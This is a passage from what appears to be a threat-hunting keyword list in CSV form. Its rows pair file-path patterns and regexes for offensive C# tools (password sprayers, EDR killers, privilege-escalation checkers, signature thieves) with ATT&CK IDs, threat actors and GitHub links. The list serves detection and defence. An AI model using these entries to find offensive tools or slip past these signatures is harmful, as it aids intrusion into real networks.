"*\SharpSphere.exe*",".{0,1000}\\SharpSphere\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18690"
"*\SharpSphere.exe*",".{0,1000}\\SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18691"
"*\SharpSploit.csproj*",".{0,1000}\\SharpSploit\.csproj.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","18692"
"*\SharpSploit.dll*",".{0,1000}\\SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18693"
"*\SharpSploit.dll*",".{0,1000}\\SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","18694"
"*\SharpSploit.xml*",".{0,1000}\\SharpSploit\.xml.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","18695"
"*\SharpSploitConsole.*",".{0,1000}\\SharpSploitConsole\..{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","18696"
"*\SharpSploit-master*",".{0,1000}\\SharpSploit\-master.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","18697"
"*\SharpSpray.csproj*",".{0,1000}\\SharpSpray\.csproj.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18698"
"*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18699"
"*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18700"
"*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18701"
"*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","18702"
"*\sharpspray.exe*",".{0,1000}\\sharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18703"
"*\SharpSpray.sln*",".{0,1000}\\SharpSpray\.sln.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18704"
"*\SharpSpray\*",".{0,1000}\\SharpSpray\\.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18705"
"*\SharpSpray-1.1.zip*",".{0,1000}\\SharpSpray\-1\.1\.zip.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18706"
"*\SharpSpray1.exe*",".{0,1000}\\SharpSpray1\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18707"
"*\SharpSQL.exe*",".{0,1000}\\SharpSQL\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18708"
"*\SharpSql.exe*",".{0,1000}\\SharpSql\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18709"
"*\SharpSQL.exe*",".{0,1000}\\SharpSQL\.exe.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18710"
"*\SharpSQL.pdb*",".{0,1000}\\SharpSQL\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18711"
"*\SharpSQL.pdb*",".{0,1000}\\SharpSQL\.pdb.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18712"
"*\SharpSQLDump.exe*",".{0,1000}\\SharpSQLDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18713"
"*\SharpSQLPwn.exe*",".{0,1000}\\SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18714"
"*\SharpSQLPwn.exe*",".{0,1000}\\SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18715"
"*\SharpSQLTools.exe*",".{0,1000}\\SharpSQLTools\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18716"
"*\SharpSSDP.csproj*",".{0,1000}\\SharpSSDP\.csproj.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","18717"
"*\SharpSSDP.sln*",".{0,1000}\\SharpSSDP\.sln.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","18718"
"*\SharpSSDP\*",".{0,1000}\\SharpSSDP\\.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","18719"
"*\SharpStay.exe*",".{0,1000}\\SharpStay\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18720"
"*\SharpStay.exe*",".{0,1000}\\SharpStay\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18721"
"*\SharpStay.exe*",".{0,1000}\\SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18722"
"*\SharpSvc.exe*",".{0,1000}\\SharpSvc\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18723"
"*\SharpSvc.exe*",".{0,1000}\\SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18724"
"*\SharpTask.exe*",".{0,1000}\\SharpTask\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18725"
"*\SharpTask.exe*",".{0,1000}\\SharpTask\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18726"
"*\SharpTask.exe*",".{0,1000}\\SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18727"
"*\SharpTerminator.csproj*",".{0,1000}\\SharpTerminator\.csproj.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","18728"
"*\SharpThief\*",".{0,1000}\\SharpThief\\.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","18729"
"*\SharpThief-main*",".{0,1000}\\SharpThief\-main.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","18730"
"*\SharpTokenFinder.exe*",".{0,1000}\\SharpTokenFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18731"
"*\SharpUp.csproj*",".{0,1000}\\SharpUp\.csproj.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","18732"
"*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18733"
"*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18734"
"*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18735"
"*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18736"
"*\SharpUp.pdb*",".{0,1000}\\SharpUp\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18737"
